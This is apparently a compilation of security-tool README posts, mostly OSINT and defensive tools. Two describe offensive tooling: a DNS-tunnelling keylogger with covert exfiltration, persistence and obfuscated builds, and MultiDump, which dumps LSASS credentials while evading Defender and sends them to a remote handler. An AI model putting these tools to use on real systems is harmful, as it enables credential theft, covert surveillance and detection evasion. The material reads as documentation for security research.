    Let's say you were researching "somecompany" whose website is "somecompany.io" that makes a product called "blockchaindoohickey". You could run the tool like this:

    ./cloud_enum.py -k somecompany -k somecompany.io -k blockchaindoohickey

HTTP scraping and DNS lookups use 5 threads each by default. You can try increasing this, but eventually the cloud providers will rate limit you. Here is an example increasing it to 10:

    ./cloud_enum.py -k keyword -t 10

    IMPORTANT: Some resources (Azure Containers, GCP Functions) are discovered per-region. To save time scanning, there is a "REGIONS" variable defined in cloudenum/azure_regions.py and cloudenum/gcp_regions.py that is set by default to use only 1 region. You may want to look at these files and edit them to be relevant to your own work.

    Complete Usage Details

    usage: cloud_enum.py [-h] -k KEYWORD [-m MUTATIONS] [-b BRUTE]

    Multi-cloud enumeration utility. All hail OSINT!

    optional arguments:
    -h, --help show this help message and exit
    -k KEYWORD, --keyword KEYWORD
    Keyword. Can use argument multiple times.
    -kf KEYFILE, --keyfile KEYFILE
    Input file with a single keyword per line.
    -m MUTATIONS, --mutations MUTATIONS
    Mutations. Default: enum_tools/fuzz.txt
    -b BRUTE, --brute BRUTE
    List to brute-force Azure container names. Default: enum_tools/fuzz.txt
    -t THREADS, --threads THREADS
    Threads for HTTP brute-force. Default = 5
    -ns NAMESERVER, --nameserver NAMESERVER
    DNS server to use in brute-force.
    -l LOGFILE, --logfile LOGFILE
    Will APPEND found items to specified file.
    -f FORMAT, --format FORMAT
    Format for log file (text,json,csv - defaults to text)
    --disable-aws Disable Amazon checks.
    --disable-azure Disable Azure checks.
    --disable-gcp Disable Google checks.
    -qs, --quickscan Disable all mutations and second-level scans

    Thanks

So far, I have borrowed from:
• Some of the permutations from GCPBucketBrute



    Noia - Simple Mobile Applications Sandbox File Browser Tool

    By: Zion3R


    Noia is a web-based tool whose main aim is to ease the process of browsing mobile applications sandbox and directly previewing SQLite databases, images, and more. Powered by frida.re.

Please note that I'm not a programmer, but I'm probably above the median in code-savviness. Try it out, and open an issue if you find any problems. PRs are welcome.


    Installation & Usage

    npm install -g noia
    noia

    Features

• Explore third-party applications' files and directories. Noia shows you details including access permissions, file type, and much more.

    • View custom binary files. Directly preview SQLite databases, images, and more.

    • Search application by name.

    • Search files and directories by name.

    • Navigate to a custom directory using the ctrl+g shortcut.

    • Download the application files and directories for further analysis.

    • Basic iOS support

    and more


    Setup

    Desktop requirements:

    • node.js LTS and npm
    • Any decent modern desktop browser

    Noia is available on npm, so just type the following command to install it and run it:

    npm install -g noia
    noia

    Device setup:

Noia is powered by frida.re and thus requires Frida to run.

    Rooted Device

    See: * https://frida.re/docs/android/ * https://frida.re/docs/ios/

    Non-rooted Device

    • https://koz.io/using-frida-on-android-without-root/
    • https://github.com/sensepost/objection/wiki/Patching-Android-Applications
    • https://nowsecure.com/blog/2020/01/02/how-to-conduct-jailed-testing-with-frida/

    Security Warning

This tool is not secure and may include some security vulnerabilities, so make sure to isolate the webpage from potential attackers.

    LICENCE

    MIT



    DNS-Tunnel-Keylogger - Keylogging Server And Client That Uses DNS Tunneling/Exfiltration To Transmit Keystrokes

    By: Zion3R


    This post-exploitation keylogger will covertly exfiltrate keystrokes to a server.

These tools excel at lightweight exfiltration and persistence, properties that help prevent detection. It uses DNS tunneling/exfiltration to bypass firewalls and avoid detection.


    Server

    Setup

The server uses Python 3.

    To install dependencies, run python3 -m pip install -r requirements.txt

    Starting the Server

    To start the server, run python3 main.py

    usage: dns exfiltration server [-h] [-p PORT] ip domain

    positional arguments:
    ip
    domain

    options:
    -h, --help show this help message and exit
    -p PORT, --port PORT port to listen on

    By default, the server listens on UDP port 53. Use the -p flag to specify a different port.

    ip is the IP address of the server. It is used in SOA and NS records, which allow other nameservers to find the server.

    domain is the domain to listen for, which should be the domain that the server is authoritative for.

    Registrar

On the registrar, you want to change your domain's nameservers to custom DNS.

    Point them to two domains, ns1.example.com and ns2.example.com.

Add records that point the nameserver domains to your exfiltration server's IP address.

    This is the same as setting glue records.

    Client

    Linux

The Linux keylogger consists of two bash scripts. connection.sh is used by the logger.sh script to send the keystrokes to the server. If you want to manually send data, such as a file, you can pipe data to the connection.sh script. It will automatically establish a connection and send the data.

    logger.sh

    # Usage: logger.sh [-options] domain
    # Positional Arguments:
    # domain: the domain to send data to
    # Options:
    # -p path: give path to log file to listen to
    # -l: run the logger with warnings and errors printed

    To start the keylogger, run the command ./logger.sh [domain] && exit. This will silently start the keylogger, and any inputs typed will be sent. The && exit at the end will cause the shell to close on exit. Without it, exiting will bring you back to the non-keylogged shell. Remove the &> /dev/null to display error messages.

The -p option will specify the location of the temporary log file where all the inputs are sent. By default, this is /tmp/.

The -l option will show warnings and errors, which can be useful for debugging.

logger.sh and connection.sh must be in the same directory for the keylogger to work. If you want persistence, you can add the command to .profile to start on every new interactive shell.

    connection.sh

    Usage: command [-options] domain
    Positional Arguments:
    domain: the domain to send data to
    Options:
    -n: number of characters to store before sending a packet

    Windows

    Build

To build the keylogging program, run make in the windows directory. To build with reduced size and some amount of obfuscation, make the production target. This will create the build directory for you and output a file named logger.exe in the build directory.

    make production domain=example.com

    You can also choose to build the program with debugging by making the debug target.

    make debug domain=example.com

    For both targets, you will need to specify the domain the server is listening for.

    Sending Test Requests

    You can use dig to send requests to the server:

dig @127.0.0.1 a.1.1.1.example.com A +short sends a connection request to a server on localhost.

dig @127.0.0.1 b.1.1.54686520717569636B2062726F776E20666F782E1B.example.com A +short sends a test message to localhost.

    Replace example.com with the domain the server is listening for.

    Protocol

    Starting a Connection

    A record requests starting with a indicate the start of a "connection." When the server receives them, it will respond with a fake non-reserved IP address where the last octet contains the id of the client.

    The following is the format to follow for starting a connection: a.1.1.1.[sld].[tld].

The server will respond with an IP address in the following format: 123.123.123.[id]

    Concurrent connections cannot exceed 254, and clients are never considered "disconnected."

    Exfiltrating Data

    A record requests starting with b indicate exfiltrated data being sent to the server.

    The following is the format to follow for sending data after establishing a connection: b.[packet #].[id].[data].[sld].[tld].

    The server will respond with [code].123.123.123

    id is the id that was established on connection. Data is sent as ASCII encoded in hex.

    code is one of the codes described below.
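
To make the formats concrete, here is a small sketch that builds both query names (the helper names and the example.com domain are illustrative; the hex payload below decodes to the dig test message shown earlier):

# Build the "connection" and "data" query names described above.
def connect_query(sld="example", tld="com"):
    return f"a.1.1.1.{sld}.{tld}"

def data_query(packet_num, client_id, data, sld="example", tld="com"):
    hex_data = data.encode("ascii").hex().upper()  # data is ASCII encoded as hex
    return f"b.{packet_num}.{client_id}.{hex_data}.{sld}.{tld}"

print(connect_query())                        # a.1.1.1.example.com
print(data_query(1, 1, "The quick brown fox.\x1b"))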

    Response Codes

    200: OK

    If the client sends a request that is processed normally, the server will respond with code 200.

    201: Malformed Record Requests

If the client sends a malformed record request, the server will respond with code 201.

202: Non-Existent Connections

    If the client sends a data packet with an id greater than the # of connections, the server will respond with code 202.

    203: Out of Order Packets

    If the client sends a packet with a packet id that doesn't match what is expected, the server will respond with code 203. Clients and servers should reset their packet numbers to 0. Then the client can resend the packet with the new packet id.

204: Max Connections Reached

If the client attempts to create a connection when the maximum has been reached, the server will respond with code 204.

    Dropped Packets

    Clients should rely on responses as acknowledgements of received packets. If they do not receive a response, they should resend the same payload.

    Side Notes

    Linux

    Log File

The log file containing user inputs contains ASCII control characters, such as backspace, delete, and carriage return. If you print the contents using something like cat, you should select the appropriate option to print ASCII control characters, such as -v for cat, or open it in a text editor.

    Non-Interactive Shells

    The keylogger relies on script, so the keylogger won't run in non-interactive shells.

    Windows

    Repeated Requests

For some reason, the Windows Dns_Query_A function always sends duplicate requests. The server will process them fine because it discards repeated packets.



    MultiDump - Post-Exploitation Tool For Dumping And Extracting LSASS Memory Discreetly

    By: Zion3R


    MultiDump is a post-exploitation tool written in C for dumping and extracting LSASS memory discreetly, without triggering Defender alerts, with a handler written in Python.

    Blog post: https://xre0us.io/posts/multidump


MultiDump supports LSASS dumping via ProcDump.exe or comsvcs.dll. It offers two modes: a local mode that encrypts and stores the dump file locally, and a remote mode that sends the dump to a handler for decryption and analysis.

    Usage

 __  __       _ _   _ ____
|  \/  |_   _| | |_(_)  _ \ _   _ _ __ ___  _ __
| |\/| | | | | | __| | | | | | | | '_ ` _ \| '_ \
| |  | | |_| | | |_| | |_| | |_| | | | | | | |_) |
|_|  |_|\__,_|_|\__|_|____/ \__,_|_| |_| |_| .__/
                                           |_|

    Usage: MultiDump.exe [-p <ProcDumpPath>] [-l <LocalDumpPath> | -r <RemoteHandlerAddr>] [--procdump] [-v]

    -p Path to save procdump.exe, use full path. Default to temp directory
    -l Path to save encrypted dump file, use full path. Default to current directory
    -r Set ip:port to connect to a remote handler
    --procdump Writes procdump to disk and use it to dump LSASS
    --nodump Disable LSASS dumping
    --reg Dump SAM, SECURITY and SYSTEM hives
--delay Increase the interval between connections for slower network speeds
-v Enable verbose mode

MultiDump defaults to local mode using comsvcs.dll and saves the encrypted dump in the current directory.
    Examples:
    MultiDump.exe -l C:\Users\Public\lsass.dmp -v
    MultiDump.exe --procdump -p C:\Tools\procdump.exe -r 192.168.1.100:5000
    usage: MultiDumpHandler.py [-h] [-r REMOTE] [-l LOCAL] [--sam SAM] [--security SECURITY] [--system SYSTEM] [-k KEY] [--override-ip OVERRIDE_IP]

    Handler for RemoteProcDump

    options:
    -h, --help show this help message and exit
    -r REMOTE, --remote REMOTE
    Port to receive remote dump file
    -l LOCAL, --local LOCAL
    Local dump file, key needed to decrypt
    --sam SAM Local SAM save, key needed to decrypt
    --security SECURITY Local SECURITY save, key needed to decrypt
    --system SYSTEM Local SYSTEM save, key needed to decrypt
    -k KEY, --key KEY Key to decrypt local file
    --override-ip OVERRIDE_IP
    Manually specify the IP address for key generation in remote mode, for proxied connection

As with all LSASS-related tools, Administrator/SeDebugPrivilege privileges are required.

The handler depends on Pypykatz to parse the LSASS dump, and impacket to parse the registry saves. They should be installed in your environment. If you see the error All detection methods failed, it's likely the Pypykatz version is outdated.

By default, MultiDump uses the comsvcs.dll method and saves the encrypted dump in the current directory.

    MultiDump.exe
    ...
    [i] Local Mode Selected. Writing Encrypted Dump File to Disk...
    [i] C:\Users\MalTest\Desktop\dciqjp.dat Written to Disk.
    [i] Key: 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e
    ./ProcDumpHandler.py -f dciqjp.dat -k 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e

If --procdump is used, ProcDump.exe will be written to disk to dump LSASS.

    In remote mode, MultiDump connects to the handler's listener.

    ./ProcDumpHandler.py -r 9001
    [i] Listening on port 9001 for encrypted key...
    MultiDump.exe -r 10.0.0.1:9001

    The key is encrypted with the handler's IP and port. When MultiDump connects through a proxy, the handler should use the --override-ip option to manually specify the IP address for key generation in remote mode, ensuring decryption works correctly by matching the decryption IP with the expected IP set in MultiDump -r.

An additional option to dump the SAM, SECURITY and SYSTEM hives is available with --reg; the decryption process is the same as for LSASS dumps. This is more of a convenience feature to make post-exploitation information gathering easier.

    Building MultiDump

    Open in Visual Studio, build in Release mode.

    Customising MultiDump

It is recommended to customise the binary before compiling, such as changing the static strings or the RC4 key used to encrypt them. To do so, another Visual Studio project, EncryptionHelper, is included. Simply change the key or strings, and the output of the compiled EncryptionHelper.exe can be pasted into MultiDump.c and Common.h.

    Self deletion can be toggled by uncommenting the following line in Common.h:

    #define SELF_DELETION

    To further evade string analysis, most of the output messages can be excluded from compiling by commenting the following line in Debug.h:

    //#define DEBUG

MultiDump might get detected on Windows 10 22H2 (19045) (sort of), and I have implemented a fix for it (sort of). The investigation and implementation deserve a blog post of their own: https://xre0us.io/posts/saving-lsass-from-defender/

    Credits



    mapXplore - Allow Exporting The Information Downloaded With Sqlmap To A Relational Database Like Postgres And Sqlite

    By: Zion3R


mapXplore is a modular application that imports data extracted by sqlmap into a PostgreSQL or SQLite database.

    Its main features are:

    • Import of information extracted from sqlmap to PostgreSQL or SQLite for subsequent querying.
• Sanitizes information: at import time, it decodes or transforms unreadable information into readable information.
    • Search for information in all tables, such as passwords, users, and desired information.
    • Automatic export of information stored in base64, such as:

      • Word, Excel, PowerPoint files
      • .zip files
      • Text files or plain text information
      • Images
    • Filter tables and columns by criteria.

    • Filter by different types of hash functions without requiring prior conversion.
    • Export relevant information to Excel or HTML

    Installation

    Requirements

    • python-3.11
    git clone https://github.com/daniel2005d/mapXplore
    cd mapXplore
    pip install -r requirements

    Usage

    It is a modular application, and consists of the following:

    • config: It is responsible for configuration, such as the database engine to use, import paths, among others.
    • import: It is responsible for importing and processing the information extracted from sqlmap.
    • query: It is the main module capable of filtering and extracting the required information.
      • Filter by tables
      • Filter by columns
      • Filter by one or more words
      • Filter by one or more hash functions within which are:
        • MD5
        • SHA1
        • SHA256
        • SHA3
        • ....

    Beginning

    Allows loading a default configuration at the start of the program

    python engine.py [--config config.json]

    Modules



    Dorkish - Chrome Extension Tool For OSINT & Recon

    By: Zion3R


During the reconnaissance phase or when doing OSINT, we often use Google dorking and Shodan, and thus the idea of Dorkish.
Dorkish is a Chrome extension tool that facilitates custom dork creation for Google and Shodan using the builder, and it offers prebuilt dorks for efficient reconnaissance and OSINT engagements.


    Installation And Setup

    1- Clone the repository

    git clone https://github.com/yousseflahouifi/dorkish.git

2- Go to chrome://extensions/ and enable the Developer mode in the top right corner.
3- Click on the Load unpacked extension button and select the dorkish folder.

Note: For Firefox users, you can find the extension here: https://addons.mozilla.org/en-US/firefox/addon/dorkish/

    Features

    Google dorking

• Builder with keywords to filter your Google search results.
• Prebuilt dorks for Bug bounty programs.
• Prebuilt dorks used during the reconnaissance phase in bug bounty.
• Prebuilt dorks for exposed files and directories
• Prebuilt dorks for logins and sign up portals
• Prebuilt dorks for cyber security jobs

    Shodan dorking

• Builder with filter keywords used in Shodan.
• Variety of prebuilt dorks to find IoT, network infrastructure, cameras, ICS, databases, etc.

    Usage

    Once you have found or built the dork you need, simply click it and click search. This will direct you to the desired search engine, Shodan or Google, with the specific dork you've entered. Then, you can explore and enjoy the results that match your query.

    TODO

• Add more useful dorks and categories
    • Fix some bugs
    • Add a search bar to search through the results
    • Might add some LLM models to build dorks

    Notes

I have built some dorks and I have used some public resources to gather the dorks; here are a few:
• https://github.com/lothos612/shodan
• https://github.com/TakSec/google-dorks-bug-bounty

    Warning

    • I am not responsible for any damage caused by using the tool


    DarkGPT - An OSINT Assistant Based On GPT-4-200K Designed To Perform Queries On Leaked Databases, Thus Providing An Artificial Intelligence Assistant That Can Be Useful In Your Traditional OSINT Processes

    By: Zion3R


    DarkGPT is an artificial intelligence assistant based on GPT-4-200K designed to perform queries on leaked databases. This guide will help you set up and run the project on your local environment.


    Prerequisites

    Before starting, make sure you have Python installed on your system. This project has been tested with Python 3.8 and higher versions.

    Environment Setup

    1. Clone the Repository

    First, you need to clone the GitHub repository to your local machine. You can do this by executing the following command in your terminal:

git clone https://github.com/luijait/DarkGPT.git
cd DarkGPT

2. Configure Environment Variables

    You will need to set up some environment variables for the script to work correctly. Copy the .env.example file to a new file named .env:

    DEHASHED_API_KEY="your_dehashed_api_key_here"

3. Install Dependencies

    This project requires certain Python packages to run. Install them by running the following command:

pip install -r requirements.txt

4. Then run the project:

python3 main.py



    Mhf - Mobile Helper Framework - A Tool That Automates The Process Of Identifying The Framework/Technology Used To Create A Mobile Application

    By: Zion3R


    Mobile Helper Framework is a tool that automates the process of identifying the framework/technology used to create a mobile application. Additionally, it assists in finding sensitive information or provides suggestions for working with the identified platform.


How does it work?

The tool searches for files associated with the technologies used in mobile application development, such as configuration files, resource files, and source code files. A simplified detection sketch follows the examples below.


    Example

    Cordova

    Search files:

    index.html
    cordova.js
    cordova_plugins.js

    React Native Android & iOS

Search files:

Android files:

    libreactnativejni.so
    index.android.bundle

    iOS files:

    main.jsbundle
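
A simplified sketch of this detection idea (illustrative, not mhf's actual code): since both .apk and .ipa packages are ZIP archives, it is enough to look for the marker files listed above inside the archive.

import sys
import zipfile

# Marker files taken from the examples above; the mapping is illustrative.
MARKERS = {
    "Cordova": ["cordova.js", "cordova_plugins.js"],
    "React Native (Android)": ["libreactnativejni.so", "index.android.bundle"],
    "React Native (iOS)": ["main.jsbundle"],
}

def detect(package_path):
    with zipfile.ZipFile(package_path) as z:
        names = z.namelist()
    for framework, files in MARKERS.items():
        if any(name.endswith(marker) for marker in files for name in names):
            return framework
    return "Unknown / native"

print(detect(sys.argv[1]))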

    Installation

    ❗A minimum of Java 8 is required to run Apktool.

    pip install -r requirements.txt


    Usage

    python3 mhf.py app.apk|ipa|aab


    Examples
    python3 mobile_helper_framework.py file.apk

    [+] App was written in React Native

    Do you want analizy the application (y/n) y

    Output directory already exists. Skipping decompilation.

    Beauty the react code? (y/n) n

    Search any info? (y/n) y

    ==>>Searching possible internal IPs in the file

    results.........

    ==>>Searching possible emails in the file

    results.........

    ==>>Searching possible interesting words in the file

    results.........

    ==>>Searching Private Keys in the file

    results.........

    ==>>Searching high confidential secrets

    results.........

    ==>>Searching possible sensitive URLs in js files

    results.........

    ==>>Searching possible endpoints in js files results.........

    Features

    This tool uses Apktool for decompilation of Android applications.

    This tool renames the .ipa file of iOS applications to .zip and extracts the contents.

    Feature Note Cordova React Native Native JavaScript Flutter Xamarin
    JavaScript beautifier Use this for the first few occasions to see better results. βœ… βœ… βœ…
    Identifying multiple sensitive information IPs, Private Keys, API Keys, Emails, URLs βœ… βœ… βœ… ❌
    Cryptographic Functions βœ… βœ… βœ… ❌ ❌
    Endpoint extractor βœ… βœ… βœ… ❌ ❌
    Automatically detects if the code has been beautified. ❌ ❌ ❌
    Extracts automatically apk of devices/emulator ❌ ❌ ❌ ❌ ❌
    Patching apk βœ…
    Extract an APK from a bundle file. βœ… βœ… βœ… βœ… βœ…
    Detect if JS files are encrypted ❌ ❌
    Detect if the resources are compressed. ❌ Hermesβœ… ❌ ❌ XALZβœ…
    Detect if the app is split ❌ ❌ ❌ ❌ ❌

    What is patching apk: This tool uses Reflutter, a framework that assists with reverse engineering of Flutter apps using a patched version of the Flutter library.

    More information: https://github.com/Impact-I/reFlutter


    Split APKs is a technique used by Android to reduce the size of an application and allow users to download and use only the necessary parts of the application.

    Instead of downloading a complete application in a single APK file, Split APKs divide the application into several smaller APK files, each of which contains only a part of the application such as resources, code libraries, assets, and configuration files.

    adb shell pm path com.package
    package:/data/app/com.package-NW8ZbgI5VPzvSZ1NgMa4CQ==/base.apk
    package:/data/app/com.package-NW8ZbgI5VPzvSZ1NgMa4CQ==/split_config.arm64_v8a.apk
    package:/data/app/com.package-NW8ZbgI5VPzvSZ1NgMa4CQ==/split_config.en.apk
    package:/data/app/com.package-NW8ZbgI5VPzvSZ1NgMa4CQ==/split_config.xxhdpi.apk

For example, in Flutter, if the application is split, it is necessary to patch split_config.arm64_v8a.apk; this file contains libflutter.so.


    Credits
• This tool uses the secrets-patterns-db repository created by mazen160
• This tool uses a regular expression created by Gerben_Javado to extract endpoints
• This tool uses reflutter for Flutter actions

    Changelog

    0.5
    • Public release
    • Bug fixes

    0.4
    • Added plugins information in Cordova apps
    • Added Xamarin actions
    • Added NativeScript actions
    • Bug fixes

    0.3
    • Added NativeScript app detection
• Added a signing option for when the apk extracted from an aab file is not signed

    0.2
    • Fixed issues with commands on Linux.

    0.1
    • Initial version release.

    License
    • This work is licensed under a Creative Commons Attribution 4.0 International License.

Authors

Cesar Calderon, Marco Almaguer



    RepoReaper - An Automated Tool Crafted To Meticulously Scan And Identify Exposed .Git Repositories Within Specified Domains And Their Subdomains

    By: Zion3R


    RepoReaper is a precision tool designed to automate the identification of exposed .git repositories across a list of domains and subdomains. By processing a user-provided text file with domain names, RepoReaper systematically checks each for publicly accessible .git files. This enables rapid assessment and protection against information leaks, making RepoReaper an essential resource for security teams and web developers.
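
The core check can be sketched in a few lines (an illustration, not RepoReaper's actual code): an exposed repository typically serves .git/HEAD, whose content starts with "ref:".

import requests

def git_exposed(domain):
    # An exposed .git directory usually serves HEAD with content starting with "ref:".
    url = f"https://{domain}/.git/HEAD"
    try:
        resp = requests.get(url, timeout=5, allow_redirects=False)
        return resp.status_code == 200 and resp.text.strip().startswith("ref:")
    except requests.RequestException:
        return False

for domain in ["example.com", "subdomain.example.com"]:
    if git_exposed(domain):
        print(f"[!] Exposed .git repository: {domain}")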


    Features
    • Automated scanning of domains and subdomains for exposed .git repositories.
    • Streamlines the detection of sensitive data exposures.
    • User-friendly command-line interface.
    • Ideal for security audits and Bug Bounty.

    Installation

    Clone the repository and install the required dependencies:

    git clone https://github.com/YourUsername/RepoReaper.git
    cd RepoReaper
    pip install -r requirements.txt
    chmod +x RepoReaper.py

    Usage

    RepoReaper is executed from the command line and will prompt for the path to a file containing a list of domains or subdomains to be scanned.

    To start RepoReaper, simply run:

    ./RepoReaper.py
    or
    python3 RepoReaper.py

Upon execution, RepoReaper will ask for the path to the file containing the domains or subdomains:

Enter the path of the file containing domains

    Provide the path to your text file when prompted. The file should contain one domain or subdomain per line, like so:

    example.com
    subdomain.example.com
    anotherdomain.com

RepoReaper will then proceed to scan the provided domains or subdomains for exposed .git repositories and report its findings.


    Disclaimer

    This tool is intended for educational purposes and security research only. The user assumes all responsibility for any damages or misuse resulting from its use.



    SwaggerSpy - Automated OSINT On SwaggerHub

    By: Zion3R


    SwaggerSpy is a tool designed for automated Open Source Intelligence (OSINT) on SwaggerHub. This project aims to streamline the process of gathering intelligence from APIs documented on SwaggerHub, providing valuable insights for security researchers, developers, and IT professionals.


    What is Swagger?

    Swagger is an open-source framework that allows developers to design, build, document, and consume RESTful web services. It simplifies API development by providing a standard way to describe REST APIs using a JSON or YAML format. Swagger enables developers to create interactive documentation for their APIs, making it easier for both developers and non-developers to understand and use the API.


    About SwaggerHub

    SwaggerHub is a collaborative platform for designing, building, and managing APIs using the Swagger framework. It offers a centralized repository for API documentation, version control, and collaboration among team members. SwaggerHub simplifies the API development lifecycle by providing a unified platform for API design and testing.


    Why OSINT on SwaggerHub?

    Performing OSINT on SwaggerHub is crucial because developers, in their pursuit of efficient API documentation and sharing, may inadvertently expose sensitive information. Here are key reasons why OSINT on SwaggerHub is valuable:

    1. Developer Oversights: Developers might unintentionally include secrets, credentials, or sensitive information in API documentation on SwaggerHub. These oversights can lead to security vulnerabilities and unauthorized access if not identified and addressed promptly.

    2. Security Best Practices: OSINT on SwaggerHub helps enforce security best practices. Identifying and rectifying potential security issues early in the development lifecycle is essential to ensure the confidentiality and integrity of APIs.

    3. Preventing Data Leaks: By systematically scanning SwaggerHub for sensitive information, organizations can proactively prevent data leaks. This is especially crucial in today's interconnected digital landscape where APIs play a vital role in data exchange between services.

    4. Risk Mitigation: Understanding that developers might forget to remove or obfuscate sensitive details in API documentation underscores the importance of continuous OSINT on SwaggerHub. This proactive approach mitigates the risk of unintentional exposure of critical information.

    5. Compliance and Privacy: Many industries have stringent compliance requirements regarding the protection of sensitive data. OSINT on SwaggerHub ensures that APIs adhere to these regulations, promoting a culture of compliance and safeguarding user privacy.

    6. Educational Opportunities: Identifying oversights in SwaggerHub documentation provides educational opportunities for developers. It encourages a security-conscious mindset, fostering a culture of awareness and responsible information handling.

    By recognizing that developers can inadvertently expose secrets, OSINT on SwaggerHub becomes an integral part of the overall security strategy, safeguarding against potential threats and promoting a secure API ecosystem.


    How SwaggerSpy Works

    SwaggerSpy obtains information from SwaggerHub and utilizes regular expressions to inspect API documentation for sensitive information, such as secrets and credentials.
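
As an illustration of that approach, here is a sketch (the patterns and sample document are assumptions, not SwaggerSpy's actual ruleset):

import re

# Two illustrative secret patterns; real tooling uses much larger rule sets.
PATTERNS = {
    "AWS access key ID": re.compile(r"AKIA[0-9A-Z]{16}"),
    "Generic api_key field": re.compile(r"(?i)api[_-]?key\"?\s*[:=]\s*\"?[A-Za-z0-9_\-]{16,}"),
}

def scan(document):
    findings = []
    for name, pattern in PATTERNS.items():
        for match in pattern.finditer(document):
            findings.append((name, match.group(0)))
    return findings

sample = '{"api_key": "abcd1234abcd1234abcd", "host": "api.example.com"}'
for name, value in scan(sample):
    print(f"{name}: {value}")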


    Getting Started

    To use SwaggerSpy, follow these steps:

    1. Installation: Clone the SwaggerSpy repository and install the required dependencies.
    git clone https://github.com/UndeadSec/SwaggerSpy.git
    cd SwaggerSpy
    pip install -r requirements.txt
2. Usage: Run SwaggerSpy with the target search terms (more accurate with domains).
    python swaggerspy.py searchterm
3. Results: SwaggerSpy will generate a report containing OSINT findings, including information about the API, endpoints, and secrets.

    Disclaimer

    SwaggerSpy is intended for educational and research purposes only. Users are responsible for ensuring that their use of this tool complies with applicable laws and regulations.


    Contribution

    Contributions to SwaggerSpy are welcome! Feel free to submit issues, feature requests, or pull requests to help improve this tool.


    About the Author

    SwaggerSpy is developed and maintained by Alisson Moretto (UndeadSec)

    I'm a passionate cyber threat intelligence pro who loves sharing insights and crafting cybersecurity tools.


    TODO

    Regular Expressions Enhancement
    • [ ] Review and improve existing regular expressions.
    • [ ] Ensure that regular expressions adhere to best practices.
    • [ ] Check for any potential optimizations in the regex patterns.
    • [ ] Test regular expressions with various input scenarios for accuracy.
    • [ ] Document any complex or non-trivial regex patterns for better understanding.
    • [ ] Explore opportunities to modularize or break down complex patterns.
    • [ ] Verify the regular expressions against the latest specifications or requirements.
    • [ ] Update documentation to reflect any changes made to the regular expressions.

    License

    SwaggerSpy is licensed under the MIT License. See the LICENSE file for details.


    Thanks

    Special thanks to @Liodeus for providing project inspiration through swaggerHole.



    Argus - A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions

    By: Zion3R

    This repo contains the code for our USENIX Security '23 paper "ARGUS: A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions". Argus is a comprehensive security analysis tool specifically designed for GitHub Actions. Built with an aim to enhance the security of CI/CD workflows, Argus utilizes taint-tracking techniques and an impact classifier to detect potential vulnerabilities in GitHub Action workflows.

    Visit our website - secureci.org for more information.


    Features

    • Taint-Tracking: Argus uses sophisticated algorithms to track the flow of potentially untrusted data from specific sources to security-critical sinks within GitHub Actions workflows. This enables the identification of vulnerabilities that could lead to code injection attacks.

    • Impact Classifier: Argus classifies identified vulnerabilities into High, Medium, and Low severity classes, providing a clearer understanding of the potential impact of each identified vulnerability. This is crucial in prioritizing mitigation efforts.
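
    For intuition only (this is a toy pattern check, not Argus's staged static taint analysis), the class of bug it hunts can be pictured as: a run: step that interpolates an attacker-controllable event field directly into the shell. The field list below is an illustrative, partial assumption.

    import re

    # Event fields an attacker can often influence; an illustrative, partial list.
    TAINTED = re.compile(
        r"\$\{\{\s*github\.event\.(issue\.title|issue\.body|pull_request\.title|"
        r"pull_request\.body|comment\.body|head_commit\.message)\s*\}\}"
    )

    def flag_injection_risks(workflow_yaml: str) -> list:
        """Return (line number, text) pairs where a run: line interpolates tainted input."""
        findings = []
        for lineno, line in enumerate(workflow_yaml.splitlines(), start=1):
            if re.match(r"\s*-?\s*run:", line) and TAINTED.search(line):
                findings.append((lineno, line.strip()))
        return findings

    workflow = """
    on: issues
    jobs:
      greet:
        runs-on: ubuntu-latest
        steps:
          - run: echo "New issue: ${{ github.event.issue.title }}"
    """
    for lineno, text in flag_injection_risks(workflow):
        print(f"line {lineno}: possible code injection -> {text}")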

    Usage

    This Python script provides a command line interface for interacting with GitHub repositories and GitHub actions.

    python argus.py --mode [mode] --url [url] [--output-folder path_to_output] [--config path_to_config] [--verbose] [--branch branch_name] [--commit commit_hash] [--tag tag_name] [--action-path path_to_action] [--workflow-path path_to_workflow]

    Parameters:

    • --mode: The mode of operation. Choose either 'repo' or 'action'. This parameter is required.
    • --url: The GitHub URL. Use USERNAME:TOKEN@URL for private repos. This parameter is required.
    • --output-folder: The output folder. The default value is '/tmp'. This parameter is optional.
    • --config: The config file. This parameter is optional.
    • --verbose: Verbose mode. If this option is provided, the logging level is set to DEBUG. Otherwise, it is set to INFO. This parameter is optional.
    • --branch: The branch name. You must provide exactly one of: --branch, --commit, --tag. This parameter is optional.
    • --commit: The commit hash. You must provide exactly one of: --branch, --commit, --tag. This parameter is optional.
    • --tag: The tag. You must provide exactly one of: --branch, --commit, --tag. This parameter is optional.
    • --action-path: The (relative) path to the action. You cannot provide --action-path in repo mode. This parameter is optional.
    • --workflow-path: The (relative) path to the workflow. You cannot provide --workflow-path in action mode. This parameter is optional.

    Example:

    To use this script to interact with a GitHub repo, you might run a command like the following:

    python argus.py --mode repo --url https://github.com/username/repo.git --branch master

    This would run the script in repo mode on the master branch of the specified repository.

    How to use

    Argus can be run inside a docker container. To do so, follow the steps:

    • Install docker and docker-compose
      • apt-get -y install docker.io docker-compose
    • Clone the release branch of this repo
      • git clone <>
    • Build the docker container
      • docker-compose build
    • Now you can run argus. Example run:
      • docker-compose run argus --mode {mode} --url {url to target repo}
    • Results will be available inside the results folder

    Viewing SARIF Results

    You can view SARIF results either through an online viewer or with a Visual Studio Code (VSCode) extension.

    1. Online Viewer: The SARIF Web Viewer is an online tool that allows you to visualize SARIF files. You can upload your SARIF file (argus_report.sarif) directly to the website to view the results.

    2. VSCode Extension: If you prefer to use VSCode, you can install the SARIF Viewer extension. After installing the extension, you can open your SARIF file (argus_report.sarif) in VSCode. The results will appear in the SARIF Explorer pane, which provides a detailed and navigable view of the results.

    Remember to handle the SARIF file with care, especially if it contains sensitive information from your codebase.

    Troubleshooting

    If GitHub authorization is required for a run, you can provide username:TOKEN in the GITHUB_CREDS environment variable; it will be used for all requests made to GitHub. Note that we do not store this information anywhere, nor do we create anything in the GitHub account - we only use it for cloning repositories.

    Contributions

    Argus is an open-source project, and we welcome contributions from the community. Whether it's reporting a bug, suggesting a feature, or writing code, your contributions are always appreciated!

    Cite Argus

